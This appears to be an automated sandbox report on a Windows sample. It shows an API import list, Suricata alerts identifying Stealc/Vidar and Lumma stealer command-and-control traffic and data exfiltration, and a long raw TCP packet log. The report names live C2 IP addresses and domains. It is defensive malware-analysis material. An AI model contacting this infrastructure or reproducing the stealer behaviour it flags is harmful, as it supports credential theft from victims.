                                                                                                                                                                                                                    KERNEL32.dllGetProcAddress, CreateFileW, CloseHandle, GetConsoleWindow, MultiByteToWideChar, GetStringTypeW, WideCharToMultiByte, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, EncodePointer, DecodePointer, LCMapStringEx, GetCPInfo, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, HeapSize, RaiseException, RtlUnwind, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, WriteConsoleW, LoadLibraryExW, GetStdHandle, WriteFile, GetModuleFileNameW, ExitProcess, GetModuleHandleExW, HeapFree, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, HeapAlloc, GetFileType, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, ReadFile, GetFileSizeEx, SetFilePointerEx, ReadConsoleW, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, GetProcessHeap

                                                                                                                                                                                                                    Possible Origin

                                                                                                                                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                    EnglishUnited States

                                                                                                                                                                                                                    Network Behavior

                                                                                                                                                                                                                    Suricata IDS Alerts

                                                                                                                                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                    2024-10-03T15:14:36.299028+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.84971349.12.197.9443TCP
                                                                                                                                                                                                                    2024-10-03T15:14:37.689850+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.84971449.12.197.9443TCP
                                                                                                                                                                                                                    2024-10-03T15:14:39.062524+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.84971549.12.197.9443TCP
                                                                                                                                                                                                                    2024-10-03T15:14:40.417792+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.85623749.12.197.9443TCP
                                                                                                                                                                                                                    2024-10-03T15:14:41.119683+02002049087ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST1192.168.2.85623749.12.197.9443TCP
                                                                                                                                                                                                                    2024-10-03T15:14:41.119899+02002044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config149.12.197.9443192.168.2.856237TCP
                                                                                                                                                                                                                    2024-10-03T15:14:41.775560+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.85623849.12.197.9443TCP
                                                                                                                                                                                                                    2024-10-03T15:14:42.473975+02002051831ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1149.12.197.9443192.168.2.856238TCP
                                                                                                                                                                                                                    2024-10-03T15:14:43.192813+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.85623949.12.197.9443TCP
                                                                                                                                                                                                                    2024-10-03T15:14:44.196910+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.85624049.12.197.9443TCP
                                                                                                                                                                                                                    2024-10-03T15:14:47.406735+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.85624149.12.197.9443TCP
                                                                                                                                                                                                                    2024-10-03T15:14:48.495165+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.85624249.12.197.9443TCP
                                                                                                                                                                                                                    2024-10-03T15:14:49.627817+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.85624449.12.197.9443TCP
                                                                                                                                                                                                                    2024-10-03T15:14:50.758435+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.85624549.12.197.9443TCP
                                                                                                                                                                                                                    2024-10-03T15:14:52.456117+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.85624749.12.197.9443TCP
                                                                                                                                                                                                                    2024-10-03T15:14:54.320488+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.85624949.12.197.9443TCP
                                                                                                                                                                                                                    2024-10-03T15:14:55.857897+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.85625049.12.197.9443TCP
                                                                                                                                                                                                                    2024-10-03T15:14:57.290766+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.85625149.12.197.9443TCP
                                                                                                                                                                                                                    2024-10-03T15:14:58.538988+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.85625249.12.197.9443TCP
                                                                                                                                                                                                                    2024-10-03T15:15:01.488986+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.85625349.12.197.9443TCP
                                                                                                                                                                                                                    2024-10-03T15:15:02.867487+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.85625449.12.197.9443TCP
                                                                                                                                                                                                                    2024-10-03T15:15:04.205708+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.85625549.12.197.9443TCP
                                                                                                                                                                                                                    2024-10-03T15:15:05.605832+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.85625649.12.197.9443TCP
                                                                                                                                                                                                                    2024-10-03T15:15:07.639807+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.85625749.12.197.9443TCP
                                                                                                                                                                                                                    2024-10-03T15:15:09.807815+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.85625849.12.197.9443TCP
                                                                                                                                                                                                                    2024-10-03T15:15:15.774920+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.856259147.45.44.10480TCP
                                                                                                                                                                                                                    2024-10-03T15:15:18.018253+02002056408ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (soldiefieop .site)1192.168.2.8524481.1.1.153UDP
                                                                                                                                                                                                                    2024-10-03T15:15:18.029568+02002056402ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (questionsmw .store)1192.168.2.8542121.1.1.153UDP
                                                                                                                                                                                                                    2024-10-03T15:15:18.058566+02002056392ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (abnomalrkmu .site)1192.168.2.8545461.1.1.153UDP
                                                                                                                                                                                                                    2024-10-03T15:15:18.069567+02002056396ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (chorusarorp .site)1192.168.2.8630601.1.1.153UDP
                                                                                                                                                                                                                    2024-10-03T15:15:18.080581+02002056410ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (treatynreit .site)1192.168.2.8595511.1.1.153UDP
                                                                                                                                                                                                                    2024-10-03T15:15:18.101598+02002056406ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (snarlypagowo .site)1192.168.2.8611211.1.1.153UDP
                                                                                                                                                                                                                    2024-10-03T15:15:18.113568+02002056400ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mysterisop .site)1192.168.2.8558651.1.1.153UDP
                                                                                                                                                                                                                    2024-10-03T15:15:18.125505+02002056394ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (absorptioniw .site)1192.168.2.8507321.1.1.153UDP
                                                                                                                                                                                                                    2024-10-03T15:15:18.459716+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.85626249.12.197.9443TCP
                                                                                                                                                                                                                    2024-10-03T15:15:20.848335+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.85626549.12.197.9443TCP
                                                                                                                                                                                                                    2024-10-03T15:15:21.246548+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.856266172.67.166.76443TCP
                                                                                                                                                                                                                    2024-10-03T15:15:21.246548+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.856266172.67.166.76443TCP
                                                                                                                                                                                                                    2024-10-03T15:15:22.702271+02002054495ET MALWARE Vidar Stealer Form Exfil1192.168.2.85626845.132.206.25180TCP

                                                                                                                                                                                                                    Network Port Distribution

                                                                                                                                                                                                                    TCP Packets

                                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                    Oct 3, 2024 15:14:03.381665945 CEST49673443192.168.2.823.206.229.226
                                                                                                                                                                                                                    Oct 3, 2024 15:14:03.709801912 CEST49672443192.168.2.823.206.229.226
                                                                                                                                                                                                                    Oct 3, 2024 15:14:09.272279024 CEST49676443192.168.2.852.182.143.211
                                                                                                                                                                                                                    Oct 3, 2024 15:14:11.881624937 CEST4967780192.168.2.8192.229.211.108
                                                                                                                                                                                                                    Oct 3, 2024 15:14:12.991003990 CEST49673443192.168.2.823.206.229.226
                                                                                                                                                                                                                    Oct 3, 2024 15:14:13.319139004 CEST49672443192.168.2.823.206.229.226
                                                                                                                                                                                                                    Oct 3, 2024 15:14:15.177901030 CEST4434970423.206.229.226192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:15.178021908 CEST49704443192.168.2.823.206.229.226
                                                                                                                                                                                                                    Oct 3, 2024 15:14:34.002335072 CEST49712443192.168.2.8104.102.49.254
                                                                                                                                                                                                                    Oct 3, 2024 15:14:34.002410889 CEST44349712104.102.49.254192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:34.002511024 CEST49712443192.168.2.8104.102.49.254
                                                                                                                                                                                                                    Oct 3, 2024 15:14:34.004770041 CEST49712443192.168.2.8104.102.49.254
                                                                                                                                                                                                                    Oct 3, 2024 15:14:34.004808903 CEST44349712104.102.49.254192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:34.653462887 CEST44349712104.102.49.254192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:34.653624058 CEST49712443192.168.2.8104.102.49.254
                                                                                                                                                                                                                    Oct 3, 2024 15:14:34.706885099 CEST49712443192.168.2.8104.102.49.254
                                                                                                                                                                                                                    Oct 3, 2024 15:14:34.706923008 CEST44349712104.102.49.254192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:34.707285881 CEST44349712104.102.49.254192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:34.707374096 CEST49712443192.168.2.8104.102.49.254
                                                                                                                                                                                                                    Oct 3, 2024 15:14:34.728740931 CEST49712443192.168.2.8104.102.49.254
                                                                                                                                                                                                                    Oct 3, 2024 15:14:34.771410942 CEST44349712104.102.49.254192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:35.171317101 CEST44349712104.102.49.254192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:35.171336889 CEST44349712104.102.49.254192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:35.171351910 CEST44349712104.102.49.254192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:35.171406984 CEST49712443192.168.2.8104.102.49.254
                                                                                                                                                                                                                    Oct 3, 2024 15:14:35.171423912 CEST44349712104.102.49.254192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:35.171453953 CEST49712443192.168.2.8104.102.49.254
                                                                                                                                                                                                                    Oct 3, 2024 15:14:35.171483040 CEST49712443192.168.2.8104.102.49.254
                                                                                                                                                                                                                    Oct 3, 2024 15:14:35.273756981 CEST44349712104.102.49.254192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:35.273786068 CEST44349712104.102.49.254192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:35.273839951 CEST49712443192.168.2.8104.102.49.254
                                                                                                                                                                                                                    Oct 3, 2024 15:14:35.273852110 CEST44349712104.102.49.254192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:35.273888111 CEST49712443192.168.2.8104.102.49.254
                                                                                                                                                                                                                    Oct 3, 2024 15:14:35.273904085 CEST49712443192.168.2.8104.102.49.254
                                                                                                                                                                                                                    Oct 3, 2024 15:14:35.287338018 CEST44349712104.102.49.254192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:35.287465096 CEST49712443192.168.2.8104.102.49.254
                                                                                                                                                                                                                    Oct 3, 2024 15:14:35.287468910 CEST44349712104.102.49.254192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:35.287512064 CEST49712443192.168.2.8104.102.49.254
                                                                                                                                                                                                                    Oct 3, 2024 15:14:35.291059971 CEST49712443192.168.2.8104.102.49.254
                                                                                                                                                                                                                    Oct 3, 2024 15:14:35.291073084 CEST44349712104.102.49.254192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:35.405107975 CEST49713443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:35.405164957 CEST4434971349.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:35.405529022 CEST49713443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:35.408946037 CEST49713443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:35.408962011 CEST4434971349.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:36.298089981 CEST4434971349.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:36.299027920 CEST49713443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:36.301775932 CEST49713443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:36.301786900 CEST4434971349.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:36.302120924 CEST4434971349.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:36.302247047 CEST49713443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:36.302568913 CEST49713443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:36.347408056 CEST4434971349.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:36.791305065 CEST4434971349.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:36.791426897 CEST4434971349.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:36.791522980 CEST49713443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:36.794213057 CEST49713443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:36.794234037 CEST4434971349.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:36.796286106 CEST49714443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:36.796314001 CEST4434971449.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:36.796392918 CEST49714443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:36.796597004 CEST49714443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:36.796612024 CEST4434971449.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:37.689779043 CEST4434971449.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:37.689850092 CEST49714443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:37.690916061 CEST49714443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:37.690931082 CEST4434971449.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:37.692455053 CEST49714443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:37.692461014 CEST4434971449.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:38.399341106 CEST4434971449.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:38.399414062 CEST49714443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:38.399441004 CEST4434971449.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:38.399466038 CEST4434971449.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:38.399518967 CEST49714443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:38.399518967 CEST49714443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:38.399651051 CEST49714443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:38.399667978 CEST4434971449.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:38.401165009 CEST49715443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:38.401210070 CEST4434971549.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:38.401282072 CEST49715443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:38.401628017 CEST49715443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:38.401644945 CEST4434971549.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:39.062414885 CEST4434971549.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:39.062524080 CEST49715443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:39.063215017 CEST49715443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:39.063222885 CEST4434971549.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:39.064940929 CEST49715443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:39.064948082 CEST4434971549.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:39.124916077 CEST5623553192.168.2.8162.159.36.2
                                                                                                                                                                                                                    Oct 3, 2024 15:14:39.129707098 CEST5356235162.159.36.2192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:39.129803896 CEST5623553192.168.2.8162.159.36.2
                                                                                                                                                                                                                    Oct 3, 2024 15:14:39.129868984 CEST5623553192.168.2.8162.159.36.2
                                                                                                                                                                                                                    Oct 3, 2024 15:14:39.134579897 CEST5356235162.159.36.2192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:39.592917919 CEST5356235162.159.36.2192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:39.593523979 CEST5623553192.168.2.8162.159.36.2
                                                                                                                                                                                                                    Oct 3, 2024 15:14:39.599144936 CEST5356235162.159.36.2192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:39.599251032 CEST5623553192.168.2.8162.159.36.2
                                                                                                                                                                                                                    Oct 3, 2024 15:14:39.741636992 CEST4434971549.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:39.741691113 CEST4434971549.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:39.741836071 CEST49715443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:39.741843939 CEST4434971549.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:39.741916895 CEST49715443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:39.742168903 CEST49715443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:39.742187977 CEST4434971549.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:39.745184898 CEST56237443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:39.745238066 CEST4435623749.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:39.745321989 CEST56237443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:39.746216059 CEST56237443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:39.746228933 CEST4435623749.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:40.417655945 CEST4435623749.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:40.417792082 CEST56237443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:40.418273926 CEST56237443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:40.418281078 CEST4435623749.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:40.420958042 CEST56237443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:40.420963049 CEST4435623749.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:41.119632006 CEST4435623749.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:41.119673014 CEST4435623749.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:41.119693041 CEST56237443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:41.119709969 CEST4435623749.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:41.119735956 CEST56237443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:41.119752884 CEST4435623749.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:41.119760036 CEST56237443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:41.119796991 CEST56237443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:41.120167971 CEST56237443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:41.120188951 CEST4435623749.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:41.121923923 CEST56238443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:41.121958017 CEST4435623849.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:41.122035027 CEST56238443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:41.122293949 CEST56238443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:41.122308016 CEST4435623849.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:41.775445938 CEST4435623849.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:41.775559902 CEST56238443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:41.776184082 CEST56238443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:41.776190042 CEST4435623849.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:41.777940035 CEST56238443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:41.777946949 CEST4435623849.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:42.473541021 CEST4435623849.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:42.473653078 CEST56238443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:42.473670959 CEST4435623849.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:42.473707914 CEST56238443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:42.473737001 CEST4435623849.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:42.473784924 CEST56238443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:42.473856926 CEST56238443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:42.473875046 CEST4435623849.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:42.548913002 CEST56239443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:42.548970938 CEST4435623949.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:42.549056053 CEST56239443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:42.549304008 CEST56239443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:42.549320936 CEST4435623949.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:43.192615986 CEST4435623949.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:43.192812920 CEST56239443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:43.193228960 CEST56239443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:43.193239927 CEST4435623949.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:43.195254087 CEST56239443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:43.195259094 CEST4435623949.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:43.195336103 CEST56239443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:43.195347071 CEST4435623949.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:43.538747072 CEST56240443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:43.538805008 CEST4435624049.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:43.538901091 CEST56240443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:43.539221048 CEST56240443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:43.539241076 CEST4435624049.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:43.954268932 CEST4435623949.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:43.954340935 CEST56239443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:43.954358101 CEST4435623949.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:43.954442978 CEST56239443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:43.954449892 CEST4435623949.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:43.954525948 CEST56239443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:43.955394983 CEST56239443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:43.955420017 CEST4435623949.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:44.196815968 CEST4435624049.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:44.196909904 CEST56240443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:44.197401047 CEST56240443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:44.197406054 CEST4435624049.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:44.199831009 CEST56240443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:44.199835062 CEST4435624049.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:44.628725052 CEST4435624049.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:44.628746033 CEST4435624049.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:44.628776073 CEST4435624049.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:44.628813982 CEST56240443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:44.628840923 CEST56240443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:44.628848076 CEST4435624049.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:44.628901005 CEST56240443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:44.659635067 CEST4435624049.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:44.659656048 CEST4435624049.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:44.659761906 CEST56240443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:44.659774065 CEST4435624049.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:44.659786940 CEST56240443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:44.659816027 CEST56240443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:44.726859093 CEST4435624049.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:44.726872921 CEST4435624049.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:44.726982117 CEST56240443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:44.726989985 CEST4435624049.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:44.727045059 CEST56240443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:44.756464005 CEST4435624049.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:44.756480932 CEST4435624049.12.197.9192.168.2.8
